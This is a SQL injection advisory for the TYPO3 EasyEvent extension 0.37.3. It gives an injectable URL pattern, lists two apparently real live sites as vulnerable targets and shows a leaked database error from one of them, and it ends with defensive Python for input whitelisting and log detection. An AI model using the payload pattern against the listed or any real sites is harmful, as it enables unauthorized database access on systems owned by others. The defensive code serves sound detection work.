####################################################################
# Exploit Title : Typo3 CMS T3 EasyEvent tx_easyevent_pi1 0.37.3 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/02/2019
# Vendor Homepage : typo3.org
# Software Download Link : github.com/dwenzel/t3events/archive/master.zip
#                          github.com/CMSExperts/simpleevents/archive/master.zip
# Software Information Link : extensions.typo3.org/extension/t3events/
#                             github.com/CMSExperts
# Software Version : 0.37.3
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
Manage events, show teasers - puzzles, list and single views.
####################################################################
# Impact :
***********
* The Typo3 T3 EasyEvents 0.37.3 extension for TYPO3 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in the application's database.
Further exploitation of this vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser.
####################################################################
# SQL Injection Exploit :
**********************
/index.php?id=[ID-NUMBER]&no_cache=[ID-NUMBER]&tx_easyevent_pi1%5Bmode%5D=register&tx_easyevent_pi1%5Bdateid%5D=[ID-NUMBER]&tx_easyevent_pi1%5Beventid%5D=[SQL Injection]
####################################################################
# Example Vulnerable Sites :
*************************
[+] outdoor-engadin.ch/index.php?id=228&no_cache=1&tx_easyevent_pi1%5Bmode%5D=register&tx_easyevent_pi1%5Bdateid%5D=1022&tx_easyevent_pi1%5Beventid%5D=125
[+] laufschule-scuol.ch/index.php?id=359&no_cache=1&tx_easyevent_pi1%5Bmode%5D=register&tx_easyevent_pi1%5Bdateid%5D=911&tx_easyevent_pi1%5Beventid%5D=148%27
####################################################################
# Example SQL Database Error :
****************************
exec_SELECTquery
caller TYPO3\CMS\Core\Database\DatabaseConnection::exec_SELECTquery
ERROR You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') AND uid =1022 AND pid IN (232) ORDER BY startdate ASC' at line 1
lastBuiltQuery SELECT * FROM tx_easyevent_date WHERE hidden=0 AND deleted=0 AND uid IN() AND uid =1022 AND pid IN (232) ORDER BY startdate ASC
debug_backtrace require(typo3_src/typo3/sysext/cms/tslib/index_ts.php),typo3_src/index.php#28
// TYPO3\CMS\Frontend\Page\PageGenerator::renderContent#212
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGet#215
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#697
// TYPO3\CMS\Frontend\ContentObject\TemplateContentObject->render#752
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#128
// TYPO3\CMS\Frontend\ContentObject\ContentContentObject->render#752
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#107
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#734
// TYPO3\CMS\Frontend\ContentObject\CaseContentObject->render#752
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#45
// TYPO3\CMS\Frontend\ContentObject\ContentObjectArrayContentObject->render#752
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGet#40
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#697
// TYPO3\CMS\Frontend\ContentObject\CaseContentObject->render#752
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#45
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#734
// TYPO3\CMS\Frontend\ContentObject\UserContentObject->render#752
// TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->callUserFunction#41
// call_user_func_array#6665
// tx_easyevent_pi1->main#
// tx_easyevent_pi1->registerView#75
// TYPO3\CMS\Core\Database\DatabaseConnection->exec_SELECTgetRows#360
// TYPO3\CMS\Core\Database\DatabaseConnection->exec_SELECTquery#370
// TYPO3\CMS\Core\Database\DatabaseConnection->debug#305
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################
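The lastBuiltQuery above shows the eventid parameter landing inside `uid IN()` with no sanitisation, which is why a single quote breaks the statement. As an added example (not part of the advisory or of the extension's code), the Python below does two things from the defender's side: an integer-list whitelist of the kind that parameter needs before it is put into `IN(...)`, and a scan over constructed access-log lines (not real traffic) that flags any request whose tx_easyevent_pi1 eventid/dateid value is not a plain integer list, which is how the 148%27 probe shown above would surface in logs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access log lines for this example; the second
# one carries the %27 (single quote) probe that produced the error above.
SAMPLE_LOG = """\
203.0.113.10 - - [18/Feb/2019:10:00:01 +0000] "GET /index.php?id=228&no_cache=1&tx_easyevent_pi1%5Bmode%5D=register&tx_easyevent_pi1%5Bdateid%5D=1022&tx_easyevent_pi1%5Beventid%5D=125 HTTP/1.1" 200 5123
203.0.113.10 - - [18/Feb/2019:10:00:07 +0000] "GET /index.php?id=359&no_cache=1&tx_easyevent_pi1%5Bmode%5D=register&tx_easyevent_pi1%5Bdateid%5D=911&tx_easyevent_pi1%5Beventid%5D=148%27 HTTP/1.1" 500 812
203.0.113.10 - - [18/Feb/2019:10:00:09 +0000] "GET /index.php?id=359&no_cache=1&tx_easyevent_pi1%5Bmode%5D=register&tx_easyevent_pi1%5Bdateid%5D=911&tx_easyevent_pi1%5Beventid%5D=148,149 HTTP/1.1" 200 5120
"""

# Parameters the extension splices into its SQL (uid IN(...) and uid = ...).
WATCHED = ("tx_easyevent_pi1[eventid]", "tx_easyevent_pi1[dateid]")
INT_LIST = re.compile(r"^\d+(,\d+)*$")          # only "12" or "12,34,56"
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def clean_int_list(value):
    """Whitelist sanitiser: keep only the integer parts of a comma list.

    This is what the query needs before building 'uid IN(...)': quotes,
    spaces and SQL keywords are simply dropped, so "148'" becomes "".
    """
    parts = [p.strip() for p in value.split(",")]
    return ",".join(p for p in parts if p.isdigit())


def suspicious_requests(log_text):
    """Return (parameter, decoded raw value) pairs whose value is not a
    plain integer list; these are the requests worth alerting on."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        # parse_qs percent-decodes both keys (%5B -> [) and values (%27 -> ').
        query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        for name in WATCHED:
            for raw in query.get(name, []):
                if not INT_LIST.match(raw):
                    hits.append((name, raw))
    return hits


if __name__ == "__main__":
    for name, raw in suspicious_requests(SAMPLE_LOG):
        print(f"tampered {name}={raw!r} -> sanitised {clean_int_list(raw)!r}")
```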